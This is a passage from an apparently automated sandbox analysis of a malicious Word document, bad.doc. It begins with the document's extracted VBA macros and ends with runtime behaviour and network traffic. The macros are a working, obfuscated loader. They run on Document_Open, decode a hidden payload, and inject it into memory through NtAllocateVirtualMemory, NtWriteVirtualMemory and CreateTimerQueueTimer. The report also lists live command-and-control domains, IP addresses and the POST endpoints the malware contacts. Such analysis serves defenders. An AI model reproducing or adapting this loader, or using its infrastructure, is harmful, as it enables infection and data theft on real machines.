convergence = 36430 + 1
slogan = 178500 + 6
Pmt 0, tranquil, 22310, 24297, 2
gunnysack = aquaplane.Name
ranales = 7840 + 4
sermonize = Right(gunnysack, ranales)
beetlehead = jacks.ounce(sermonize)
selenipedium = 110 + 6
repartee = 33910 + 6
closeknit = 482150 + 7
Pmt 0, selenipedium, 15519, 49177, 5
fenugreek = "umbelliferae"
exocentric = "spondaic"
#If (8 * 2 + 5) > (7 - 2 * 1) And (21 - 7 * 3) * 2 < (Win64) Then
Dim nope As Long
Dim kampong As LongPtr
Dim someday As LongPtr
Dim future As Byte
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim oyez As Integer
Dim someday As Long
Dim accouplement As String
Dim kampong As Long
#End If
breastwork = 27 - 56 + 29
mountebank = "armoire"
psaltriparus = "shoehorn"
climbing = 4090 + 6
catkinate = 4 + 4
excrete = 12710 + 6
finnish = 522920 + 8
Pmt 0, catkinate, 36245, 46809, 2
brachygraphy = "benghazi"
escarpment = accomodation
homespun = 20 + 8
aceite = 20800 + 9
maleficent = 535250 + 7
Pmt 0, homespun, 2344, 52505, 8
nairne = beetlehead
kampong = embodiment(nairne)
salviniaceae = "camshaft"
sanctorum = "bunko"
#If (3 * 4 + 5) > (5 - 2 * 1) And (8 - 4 * 2) * 2 < (Win64) Then
Dim empires As Integer
Dim dangle As LongPtr
Dim outvie As LongPtr
Dim apar As LongPtr
pinacotheca = 62 - 85 + 2087
#End If
agonies = "brooms"
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim dangle As Long
ea = 33 + 28 + 720
Dim outvie As Long
Dim apar As Long
pinacotheca = ea + 3459
#End If
Dim husbandry As Byte
Dim antacid As Long
dangle = 4 - 4
someday = kampong + pinacotheca
outvie = 58 + 30 + 201439
apar = 15 + 3485
philosophically = bizons(outvie, dangle, someday)
yesterdays = 20 + 6
motor = 16900 + 3
bleed = 378590 + 5
Pmt 0, yesterdays, 38716, 33503, 8
End Sub
Function embodiment(procacity)
Dim disconsolate As Variant
Dim schematic As Long
Dim agelaius As Variant
Dim twirl As Variant
trums = pinochet(20 / 4)
#If (6 * 3 + 5) > (7 - 2 * 1) And (48 - 6 * 8) * 2 < (Win64) Then
Dim cross As Long
Dim freezes As LongPtr
domino = 76 - 80 + 12
Dim profitlessly As LongPtr
Dim cacao As Variant
Dim leucadendron As Integer
Dim antigone As LongPtr
Dim avian As Long
#End If
#If (6 * 3 + 5) > (7 - 2 * 1) And Not (48 - 6 * 8) * 2 < (Win64) Then
Dim freezes As Long
domino = 37 - 43 + 10
Dim profitlessly As Long
Dim antigone As Long
#End If
rotationally = VarPtr(freezes)
veniable = kingbolt(rotationally, VarPtr(procacity) + 8, domino)
inamorato = 20 + 117 - 138
profitlessly = 3 - 3
baptismal = 4 - 4
antigone = 90 + 9677
wimpy = 4090 + 6
memorials = 64 + 0
insolently = filefish(ByVal inamorato, profitlessly, ByVal baptismal, antigone, ByVal wimpy, ByVal memorials)
subsystem = Rnd(114)
disengaged = "crawling"
kingbolt profitlessly, freezes, 116 + 6 + 5761
las = 50 + 8
sharplimbed = 8050 + 2
supine = 305820 - 10
Pmt 0, las, 14597, 30094, 6
embodiment = profitlessly
End Function
Function kingbolt(agonus, condyle, chromolithography)
trums = pinochet(20 / 4)
#If (7 * 4 + 5) > (7 - 2 * 1) And (trums) > (20 - 5 * 4) * 2 Then
Dim ambystomid As String
Dim sniggle As String
Dim meteoromancy As LongPtr
Dim fiscalize As LongPtr
Dim equivocalness As LongPtr
Dim diablerie As Byte
Dim adjudication As LongPtr
Dim bengal As LongPtr
#End If
#If (7 * 4 + 5) > (7 - 2 * 1) And Not (20 - 5 * 4) * 2 < (trums) Then
Dim fiscalize As Long
Dim inclination As Byte
Dim meteoromancy As Long
Dim flier As Variant
Dim adjudication As Long
Dim olivebrown As Byte
Dim equivocalness As Long
Dim concamerate As Variant
Dim bengal As Long
Dim scorn As Long
Dim gallicism As Integer
#End If
First = First + 179
subsystem = Fix(220)
fiscalize = agonus
bengal = chromolithography
subsystem = Rnd(252)
adjudication = condyle
mokes = 110 + 3
glowing = 31390 + 6
vitaceae = 227950 + 10
Pmt 0, mokes, 14252, 40057, 7
First = First Or 490 + 7
meteoromancy = 22 + 1 - 24
riesling ByVal meteoromancy, fiscalize, adjudication, bengal, equivocalness
First = Rnd(89)
End Function
Private Sub Document_Open()
Dim phonics As Long
Dim estrone As Integer
scissure = "pion"
inquirendum = ancora
avifauna
summary = 30 + 2
ligible = 33780 + 3
conglutinate = 504440 + 10
Pmt 0, summary, 14997, 24917, 5
End Sub"
File "jacks.bas" (Streampath: "Macros/VBA/jacks") has code: "' Then you rolled in with your hair in the wind
' Rain was driving, thunder, lightning
#If (8 * 2 + 5) > (7 - 2 * 1) And Win64 > (21 - 7 * 3) * 2 Then
' Driving us to your house
' And hit me like a hurricane
Public Declare PtrSafe Function alate Lib "Kernel32" Alias "CreateTimerQueueTimer" (napaea As Any, ByVal accipere As Any, ByVal antisubmarine As Any, ByVal suffrage As Any, ByVal millersthumb As Any, ByVal holster As Any, ByVal ankle As Any) As Long
' I was doing alright
' We locked eyes over whiskey on ice
' We locked eyes over whiskey on ice
' Driving us to your house
Public Declare PtrSafe Function naboom Lib "Ntdll.dll " Alias "AcquireSRWLockShared" (campagne As Any) As LongPtr
' Driving us to your house
' You wrecked my whole world when you came
' I was doing alright
Public Declare PtrSafe Function filefish Lib "Ntdll.dll " Alias _
"NtAllocateVirtualMemory" (afflictive As LongPtr, faute As LongPtr, ByVal unshockable As LongPtr, poundfoolishByVal As LongPtr, earthborn As LongPtr, ByVal boastful As LongPtr) As LongPtr
' The moon went hiding, stars quit shining
' But just your sight had my heart storming
Public Declare PtrSafe Function riesling Lib "Ntdll.dll " Alias "NtWriteVirtualMemory" (ByVal algorithmic As Any, ByVal distraction As Any, ByVal acrodont As Any, ByVal anglicism As Any, ByVal dynamism As Any) As LongPtr
' Rain was driving, thunder, lightning
' Started talking bout us again
' If I woulda just layed my drink down
' I was doing alright
' But just your sight had my heart storming
' The moon went hiding, stars quit shining
#End If
' But you rolled in with your hair in the wind
' You wrecked my whole world when you came
#If (8 * 2 + 5) > (7 - 2 * 1) And Not Win64 > (21 - 7 * 3) * 2 Then
' But you rolled in with your hair in the wind
' I was doing alright
Public Declare Function riesling Lib "Ntdll.dll " Alias "NtWriteVirtualMemory" (ByVal berried As Any, ByVal astroloma As Any, ByVal decumbency As Any, ByVal insupportable As Any, ByVal dalmatic As Any) As Long
' Baby, without warning
' Baby, without warning
' But you rolled in with your hair in the wind
' Then you rolled in with your hair in the wind
Public Declare Function filefish Lib "Ntdll.dll " Alias _
"NtAllocateVirtualMemory" (deterrent As Long, nonoscillatory As Long, ByVal pimple As Long, bryozoanByVal As Long, synchronistical As Long, ByVal nilpotent As Long) As Long
' But just your sight had my heart storming
' I wouldnt be in my truck
' I was doing alright
' We locked eyes over whiskey on ice
' Knew it was gonna be a long night
' Rain was driving, thunder, lightning
' If I woulda just layed my drink down
' We locked eyes over whiskey on ice
Public Declare Function alate Lib "Kernel32" Alias "CreateTimerQueueTimer" (opinionatist As Any, ByVal dehort As Any, ByVal peripherally As Any, ByVal lipstick As Any, ByVal survene As Any, ByVal ashtoreth As Any, ByVal craftiness As Any) As Long
' But just your sight had my heart storming
' And hit me like a hurricane
' Baby, without warning
' Knew it was gonna be a long night
#End If
' Hit me like a hurricane
' But just your sight had my heart storming
Function moving()
Dim pater(255) As Byte
choking = 3 - 100 + 162
Do
pater(choking) = choking - 65
choking = choking + 1
Loop While choking <= 90 + 1
choking = 40 + 8
Do
pater(choking) = choking + 4
choking = choking + 1
Loop While choking <= 50 + 8
choking = 90 + 7
Do
pater(choking) = choking - 71
choking = choking + 1
Loop While choking <= 120 + 3
pater(47) = 60 + 3
choking = 40 + 3
pater(choking) = 60 + 2
moving = pater
End Function
Function denunciation(attainture, abbess, lait)
Select Case lait
Case 33 + (10 / 2 - 5)
denunciation = attainture \ abbess
Case 43 + (5 - 3) / 2 - 1
denunciation = attainture And abbess
Case 51 + (56 / 7 - 4 * 2)
denunciation = attainture * abbess
End Select
End Function
Function bizons(wrd, buls, lky)
#If 2 + (12 * 2) > 14 / 2 And Win64 > (12 - 6 * 2) * 1 Then
Dim aln As LongPtr
Dim bis As LongPtr
Dim ority As Integer
Dim deble As LongPtr
#End If
#If 2 + (12 * 2) > 14 / 2 And Not (12 - 6 * 2) * 1 < Win64 Then
Dim aln As Long
Dim bwis As Long
Dim antery As Integer
Dim deble As Long
#End If
aln = buls
deble = lky
dan2 = alate(wrd, aln, deble, aln, aln, aln, aln)
End Function
Function ounce(ovenbird) As String
subsystem = Math.Round(232)
Dim aurist As Long
Dim kickback As Long
Dim comburent As Variant
Dim beats(63) As Long
Dim achillea As Long
disengaged = fandi
Dim acromegalic(6962) As Byte
Dim boxed As String
Dim cruzeiro As Long
Dim dendroid As Long
Dim oscitancy(63) As Long
Dim exocoetidae As Long
astonished = "bedizen"
Dim fourply As Variant
Dim ornateness As Integer
Dim zannichellia() As Byte
Dim bassetting(63) As Long
Dim anserinae As Long
antioxidant = 75 - 98 + 4055
nadolol = 58 + 16711622
discretional = 18 + 45
Dim cephalotus As String
anemopsis = 262140 + 4
afterburden = 258040 + 8
Dim jucundity As Long
opener = 16515070 + 2
galangal = 250 + 6
recantation = 8 + 56
prognostication = 113 - 43 + 65210
camelidae = 46 + 4050
cinch = 51 + 204
albedo = 65530 + 6
Dim deception As Long
marjoram = 86 - 86
archesporial = 112 - 12 + 7743
Dim radiolaria() As Byte
Dim herbage As Integer
Dim forlornness As Integer
radiolaria = VBA.StrConv(ovenbird, 128)
Dim discorporate As Byte
chastity = 30 + 3
ataxic = 9770 + 5
brassia = 231680 + 3
Pmt 0, chastity, 27112, 45784, 4
christendom = 7840 + 3
aux = vbKeyShift - 12
For ridotto = 0 To christendom
If ridotto Mod 2 = 0 Then
radiolaria(ridotto) = radiolaria(ridotto) - aux
Else
radiolaria(ridotto) = radiolaria(ridotto) - (aux - 1)
End If
Next ridotto
lip = 60 + 7
chersonese = 2630 + 3
maitreya = 308410 + 10
Pmt 0, lip, 29053, 19350, 6
ornateness = 4 - 4
namtar = 47 + 11 - 58
entanglement = 40 + 3
dissolved = moving
For cruzeiro = (7 - 7) * 1 To (50 + 13) * (5 - 4)
oscitancy(cruzeiro) = denunciation(cruzeiro, recantation, 51)
bassetting(cruzeiro) = denunciation(cruzeiro, camelidae, 51)
beats(cruzeiro) = denunciation(cruzeiro, anemopsis, 51)
Next cruzeiro
elicit = 60 + 7
bedight = 10180 + 10
chigetai = 501730 + 4
Pmt 0, elicit, 33309, 28515, 5
zannichellia = radiolaria
valley = 72 - 68
earpiercing = 50 + 2
democrats = 32080 + 6
algebra = 483550 + 10
Pmt 0, earpiercing, 2593, 13488, 2
yank = 46 - 52 + 9
First = Fix(285)
astonished = fandi
airsick = yank + 1
milklivered = 86 + 48 - 132
For exocoetidae = (4 - 4) * 1 To christendom
authentication = zannichellia(exocoetidae)
jurisdiction = zannichellia(exocoetidae + 2)
corso = bassetting(dissolved(zannichellia(exocoetidae + 1)))
filled = oscitancy(dissolved(jurisdiction)) + dissolved(zannichellia(exocoetidae + yank))
aurist = beats(dissolved(authentication)) + corso
aurist = aurist + filled
cruzeiro = denunciation(aurist, nadolol, (40 + 3))
acromegalic(dendroid) = denunciation(cruzeiro, albedo, (30 + 3))
cruzeiro = denunciation(aurist, prognostication, (40 + 3))
acromegalic(dendroid + 1) = denunciation(cruzeiro, galangal, (30 + 3))
acromegalic(dendroid + milklivered) = denunciation(aurist, cinch, (40 + 3))
dendroid = dendroid + milklivered + 1
exocoetidae = exocoetidae + 3
Next
ounce = acromegalic
End Function
Function pinochet(purina)
Dim windser As Integer
Dim tristan As Integer
fixoid = purina * 12
Dim sitroen As Variant
subway2 = purina * 2
Dim cowen() As Byte
#If (3 * 4 + purina) > (7 - 2 * 1) And Win64 > (10 - purina * 2) * 2 Then
tristan = subway2
#End If
#If (3 * 4 + purina) > (7 - 2 * 1) And Not (10 - purina * 2) * 2 < Win64 Then
tristan = (120 - fixoid)
#End If
subway3 = subway2 + tristan
pinochet = tristan
End Function"
File "affectingly.frm" (Streampath: "Macros/VBA/affectingly") has code: "" - source
- Static Parser
- relevance
- 10/10
-
Creates a writable file in a temporary directory
- details
-
"WINWORD.EXE" created file "%TEMP%\~DF19387516EAE619AF.TMP"
"WINWORD.EXE" created file "%TEMP%\~DF45056EC9CC3E5E74.TMP"
"WINWORD.EXE" created file "%TEMP%\VBE\MSForms.exd"
"WINWORD.EXE" created file "%TEMP%\~DF55FD23126D685A82.TMP"
"WINWORD.EXE" created file "%TEMP%\~DFF2460AC602BCCE33.TMP"
"WINWORD.EXE" created file "%TEMP%\~DFC945604069A833E3.TMP" - source
- API Call
- relevance
- 1/10
-
Creates mutants
- details
-
"\Sessions\1\BaseNamedObjects\Global\552FFA80-3393-423d-8671-7BA046BB5906"
"Global\MTX_MSO_AdHoc1_S-1-5-21-4162757579-3804539371-4239455898-1000"
"Local\ZoneAttributeCacheCounterMutex"
"Local\ZonesCounterMutex"
"Local\10MU_ACB10_S-1-5-5-0-59428"
"Global\552FFA80-3393-423d-8671-7BA046BB5906"
"Local\ZonesCacheCounterMutex"
"Local\10MU_ACBPIDS_S-1-5-5-0-59428"
"Local\ZonesLockedCacheCounterMutex"
"Global\MTX_MSO_Formal1_S-1-5-21-4162757579-3804539371-4239455898-1000"
"\Sessions\1\BaseNamedObjects\Local\10MU_ACBPIDS_S-1-5-5-0-59428"
"\Sessions\1\BaseNamedObjects\Local\10MU_ACB10_S-1-5-5-0-59428"
"\Sessions\1\BaseNamedObjects\Local\ZonesCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZoneAttributeCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesLockedCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_Formal1_S-1-5-21-4162757579-3804539371-4239455898-1000"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_AdHoc1_S-1-5-21-4162757579-3804539371-4239455898-1000"
"\Sessions\1\BaseNamedObjects\DBWinMutex"
"\Sessions\1\BaseNamedObjects\IESQMMUTEX_0_208" - source
- Created Mutant
- relevance
- 3/10
-
Loads rich edit control libraries
- details
- "WINWORD.EXE" loaded module "%COMMONPROGRAMFILES%\microsoft shared\OFFICE14\RICHED20.DLL" at 6C3D0000
- source
- Loaded Module
-
Process launched with changed environment
- details
- Process "svchost.exe" (Show Process) was launched with new environment variables: "WecVersionForRosebud.DC4="4""
- source
- Monitored Target
- relevance
- 10/10
-
Runs shell commands
- details
- "cmd /K" on 2017-8-8.08:11:30.150
- source
- Monitored Target
- relevance
- 5/10
-
Scanning for window names
- details
-
"WINWORD.EXE" searching for class "NetUICtrlNotifySink"
"WINWORD.EXE" searching for class "REListbox20W"
"WINWORD.EXE" searching for class "OfficeTooltip"
"WINWORD.EXE" searching for class "MsoCommandBarPopup"
"WINWORD.EXE" searching for class "MSOBALLOON"
"WINWORD.EXE" searching for class "MsoHelp10"
"WINWORD.EXE" searching for class "AgentAnim"
"WINWORD.EXE" searching for class "mspim_wnd32" - source
- API Call
- relevance
- 10/10
-
Spawns new processes
- details
-
Spawned process "svchost.exe" (Show Process)
Spawned process "cmd.exe" with commandline "cmd /K" (Show Process)
Spawned process "svchost.exe" (Show Process)
Spawned process "BNEBB1.tmp" (Show Process)
Spawned process "explorer.exe" (Show Process) - source
- Monitored Target
- relevance
- 3/10
-
Contacts domains
-
Installation/Persistance
-
Dropped files
- details
-
"7ef3892eaa887c7f4234754ecd8adfc9a5d2df9b15bf2ac0df9d8f9a878dee38.LNK" has type "MS Windows shortcut Item id list present Points to a file or directory Has Relative path Archive ctime=Tue Aug 8 15:09:32 2017 mtime=Tue Aug 8 15:09:32 2017 atime=Tue Aug 8 15:09:38 2017 length=211456 window=hide"
"~$f3892eaa887c7f4234754ecd8adfc9a5d2df9b15bf2ac0df9d8f9a878dee38.doc" has type "data"
"index.dat" has type "data"
"BNEBB1.tmp" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
"5820874.cvr" has type "data"
"MSForms.exd" has type "data"
"~WRS{22AB9B54-42E2-4ABD-8093-369D8FF6C997}.tmp" has type "FoxPro FPT blocks size 0 next free block index 218103808 1st used item "\375""
"~$Normal.dotm" has type "data" - source
- Binary File
- relevance
- 3/10
-
Touches files in the Windows directory
- details
-
"WINWORD.EXE" touched file "%WINDIR%\Globalization\Sorting\sortdefault.nls"
"WINWORD.EXE" touched file "%WINDIR%\Fonts\staticcache.dat"
"WINWORD.EXE" touched file "%WINDIR%\system32\en-US\USER32.dll.mui"
"WINWORD.EXE" touched file "%WINDIR%\Microsoft.NET\Framework\v1.0.3705\clr.dll"
"WINWORD.EXE" touched file "%WINDIR%\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll"
"WINWORD.EXE" touched file "%WINDIR%\Microsoft.NET\Framework\v1.1.4322\clr.dll"
"WINWORD.EXE" touched file "%WINDIR%\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll"
"WINWORD.EXE" touched file "%WINDIR%\Microsoft.NET\Framework\v2.0.50727\clr.dll"
"WINWORD.EXE" touched file "%WINDIR%\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll"
"WINWORD.EXE" touched file "%WINDIR%\Microsoft.NET\Framework\v4.0.30319\clr.dll"
"WINWORD.EXE" touched file "%WINDIR%\system32\en-US\SETUPAPI.dll.mui"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches\cversions.1.db"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000c.db"
"WINWORD.EXE" touched file "%WINDIR%\system32\rsaenh.dll"
"WINWORD.EXE" touched file "%WINDIR%\system32\en-US\KERNELBASE.dll.mui"
"WINWORD.EXE" touched file "%WINDIR%\System32\msxml6r.dll"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{22AB9B54-42E2-4ABD-8093-369D8FF6C997}.tmp"
"WINWORD.EXE" touched file "%WINDIR%\system32\en-US\MSCTF.dll.mui" - source
- API Call
- relevance
- 7/10
-
Dropped files
-
Network Related
-
Found potential URL in binary/memory
- details
-
Pattern match: "q.bm/E!r_IaPE7W"
Heuristic match: "api.ipify.org"
Heuristic match: "cethenjustte.com"
Heuristic match: "ariegenet.fr"
Heuristic match: "tingotosling.com"
Heuristic match: "keportsitno.com"
Pattern match: "ns.adobe.com/xap/1.0/"
Heuristic match: "?]yMcOQ'4|vU^NlP4~MqR.co"
Heuristic match: "8@bVqjqVRTY#n04Wt]v*UWb_N*UWb]J|OJc5+H7\AFBwOYqUcEcvfGkGlqr)G?a5?nO/XjGPv1Z!`{MI?YF}o}{-V_Y%L iLUq>{[I3pRxnX1I<WVKd6o?fw4Sodb+$127I%E}J>i:;N\BHe/8YH#yUSmKa'.ad"
Pattern match: "http://schemas.openxmlformats.org/drawingml/2006/main" - source
- File/Memory
- relevance
- 10/10
-
Found potential URL in binary/memory
-
System Security
-
Hooks API calls
- details
-
"VariantChangeType@OLEAUT32.DLL" in "WINWORD.EXE"
"OleLoadFromStream@OLE32.DLL" in "WINWORD.EXE"
"SysAllocStringByteLen@OLEAUT32.DLL" in "WINWORD.EXE"
"SysFreeString@OLEAUT32.DLL" in "WINWORD.EXE"
"VariantClear@OLEAUT32.DLL" in "WINWORD.EXE" - source
- Hook Detection
- relevance
- 10/10
-
Hooks API calls
-
Unusual Characteristics
-
Installs hooks/patches the running process
- details
-
"WINWORD.EXE" wrote bytes "e92399c5ee" to virtual address "0x765A5DEE" ("VariantChangeType@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "e9c5326fef" to virtual address "0x76086143" ("OleLoadFromStream@OLE32.DLL")
"WINWORD.EXE" wrote bytes "b800000000663d33c0badcc6350068dcf5116cc3" to virtual address "0x053E0C74"
"WINWORD.EXE" wrote bytes "e96033c3ee" to virtual address "0x765A4731" ("SysAllocStringByteLen@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "b800000000663d33c0ba5cc6350068dcf5116cc3" to virtual address "0x053E0C54"
"WINWORD.EXE" wrote bytes "b811110000663d33c0bad8d03f0568dcf5116cc3" to virtual address "0x053E0CB4"
"WINWORD.EXE" wrote bytes "ba90244705b98b7b116cffe1" to virtual address "0x003A1F1A"
"WINWORD.EXE" wrote bytes "b800000000663d33c0ba1cc7350068dcf5116cc3" to virtual address "0x053E0C94"
"WINWORD.EXE" wrote bytes "e99a54c2ee" to virtual address "0x765A3E59" ("SysFreeString@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "c4ca677680bb6776aa6e68769fbb677608bb677646ce677661386876de2f6876d0d96776000000001779a7754f91a7757f6fa775f4f7a77511f7a775f283a775857ea77500000000" to virtual address "0x6E121000" (part of module "MSIMG32.DLL")
"WINWORD.EXE" wrote bytes "e99e48b1ee" to virtual address "0x76683D01" ("SetUnhandledExceptionFilter@KERNEL32.DLL")
"WINWORD.EXE" wrote bytes "ddd4992a" to virtual address "0x6D6E10AC" (part of module "MSPTLS.DLL")
"WINWORD.EXE" wrote bytes "faaeae2a" to virtual address "0x6C419904" (part of module "RICHED20.DLL")
"WINWORD.EXE" wrote bytes "0346e1cb" to virtual address "0x6BFA42C4" (part of module "MSPROOF7.DLL")
"WINWORD.EXE" wrote bytes "e93655c3ee" to virtual address "0x765A3EAE" ("VariantClear@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "ba4c224705b98b7b116cffe1" to virtual address "0x003A1F42"
"WINWORD.EXE" wrote bytes "ba88d33f05b98b7b116cffe1" to virtual address "0x003A1F06"
"WINWORD.EXE" wrote bytes "86fbfd2a" to virtual address "0x653F0BA8" (part of module "MSO.DLL")
"WINWORD.EXE" wrote bytes "a6740400" to virtual address "0x6C211F20" (part of module "VBE7.DLL")
"WINWORD.EXE" wrote bytes "2a80f02a" to virtual address "0x6D8DCA70" (part of module "GFX.DLL") - source
- Hook Detection
- relevance
- 10/10
-
Installs hooks/patches the running process
File Details
bad.doc
- Filename
- bad.doc
- Size
- 207KiB (211456 bytes)
- Type
- doc office
- Description
- Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Template: Normal, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Aug 8 12:42:00 2017, Last Saved Time/Date: Tue Aug 8 15:47:00 2017, Number of Pages: 3, Number of Words: 0, Number of Characters: 5, Security: 8
- Architecture
- WINDOWS
- SHA256
- 7ef3892eaa887c7f4234754ecd8adfc9a5d2df9b15bf2ac0df9d8f9a878dee38
- MD5
- 6c5b5cbc6676c3240ac49d15c9576a41
- SHA1
- 7d687aa995c1b935943d6cbb407e34ece7203684
Classification (TrID)
- 54.2% (.DOC) Microsoft Word document
- 32.2% (.DOC) Microsoft Word document (old ver.)
- 13.5% (.) Generic OLE2 / Multistream Compound File
Screenshots
Loading content, please wait...
Hybrid Analysis
Tip: Click an analysed process below to view more details.
Analysed 6 processes in total (System Resource Monitor).
-
WINWORD.EXE
/n "C:\7ef3892eaa887c7f4234754ecd8adfc9a5d2df9b15bf2ac0df9d8f9a878dee38.doc
(PID: 3524)
-
svchost.exe
(PID: 1588)
- cmd.exe cmd /K (PID: 824)
- svchost.exe (PID: 2412)
-
BNEBB1.tmp
(PID: 1584)
- explorer.exe (PID: 1664)
-
svchost.exe
(PID: 1588)
Network Analysis
DNS Requests
Domain | Address | Registrar | Country |
---|---|---|---|
cethenjustte.com
OSINT |
86.110.117.167 | Bizcn.com,Inc. | Russian Federation |
ariegenet.fr
OSINT |
213.186.33.19 |
OVH
Name Server: dns14.ovh.net Creation Date: Sat, 23 Jan 2010 00:00:00 GMT |
France |
keportsitno.com
OSINT |
185.133.42.219 | Bizcn.com,Inc. | Russian Federation |
api.ipify.org
OSINT |
23.21.223.243 |
eNom, Inc.
Name Server: NS1.DNSIMPLE.COM Creation Date: Sun, 05 Jan 2014 22:02:15 GMT |
United States |
tingotosling.com
OSINT |
185.42.14.83 | Bizcn.com,Inc. | Russian Federation |
Contacted Hosts
IP Address | Port/Protocol | Associated Process | Details |
---|---|---|---|
23.21.223.243 |
80
TCP |
svchost.exe PID: 1588 |
United States |
86.110.117.167 |
80
TCP |
svchost.exe PID: 1588 svchost.exe PID: 2412 |
Russian Federation |
213.186.33.19 |
80
TCP |
svchost.exe PID: 1588 |
France |
185.42.14.83 |
80
TCP |
explorer.exe PID: 1664 |
Russian Federation |
185.133.42.219 |
80
TCP |
explorer.exe PID: 1664 |
Russian Federation |
Contacted Countries
HTTP Traffic
Endpoint | Request | URL | |
---|---|---|---|
23.21.223.243:80 (api.ipify.org) | GET | api.ipify.org/ | GET / HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: api.ipify.org
Cache-Control: no-cache 200 OK More Details |
86.110.117.167:80 (cethenjustte.com) | POST | cethenjustte.com/ls5/forum.php | POST /ls5/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: cethenjustte.com
Content-Length: 111
Cache-Control: no-cache 200 OK More Details |
213.186.33.19:80 (ariegenet.fr) | GET | ariegenet.fr/wp-content/plugins/easyrotator-for-wordpress/1 | GET /wp-content/plugins/easyrotator-for-wordpress/1 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: ariegenet.fr
Cache-Control: no-cache 200 OK More Details |
86.110.117.167:80 (cethenjustte.com) | POST | cethenjustte.com/mlu/forum.php | POST /mlu/forum.php HTTP/1.0
Host: cethenjustte.com
Accept: */*
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: 205
Content-Type: application/octet-stream
Connection: close
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) 200 OK More Details |
86.110.117.167:80 (cethenjustte.com) | POST | cethenjustte.com/mlu/forum.php | POST /mlu/forum.php HTTP/1.0
Host: cethenjustte.com
Accept: */*
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: 205
Content-Type: application/octet-stream
Connection: close
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) 200 OK More Details |
213.186.33.19:80 (ariegenet.fr) | GET | ariegenet.fr/wp-content/plugins/easyrotator-for-wordpress/2 | GET /wp-content/plugins/easyrotator-for-wordpress/2 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: ariegenet.fr
Cache-Control: no-cache 200 OK More Details |
213.186.33.19:80 (ariegenet.fr) | GET | ariegenet.fr/wp-content/plugins/easyrotator-for-wordpress/3 | GET /wp-content/plugins/easyrotator-for-wordpress/3 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: ariegenet.fr
Cache-Control: no-cache 200 OK More Details |
86.110.117.167:80 (cethenjustte.com) | POST | cethenjustte.com/d2/about.php | POST /d2/about.php HTTP/1.0
Host: cethenjustte.com
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: 233
Content-Type: application/octet-stream
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Encoding: binary 200 OK More Details |
86.110.117.167:80 (cethenjustte.com) | POST | cethenjustte.com/d2/about.php | POST /d2/about.php HTTP/1.0
Host: cethenjustte.com
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: 233
Content-Type: application/octet-stream
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Encoding: binary 200 OK More Details |
185.42.14.83:80 (tingotosling.com) | POST | tingotosling.com/bdl/gate.php | POST /bdl/gate.php HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: tingotosling.com
Content-Length: 261
Connection: Close 200 OK More Details |
185.133.42.219:80 (keportsitno.com) | POST | keportsitno.com/bdl/gate.php | POST /bdl/gate.php HTTP/1.1
Accept: */*
Cache-Control: no-cache
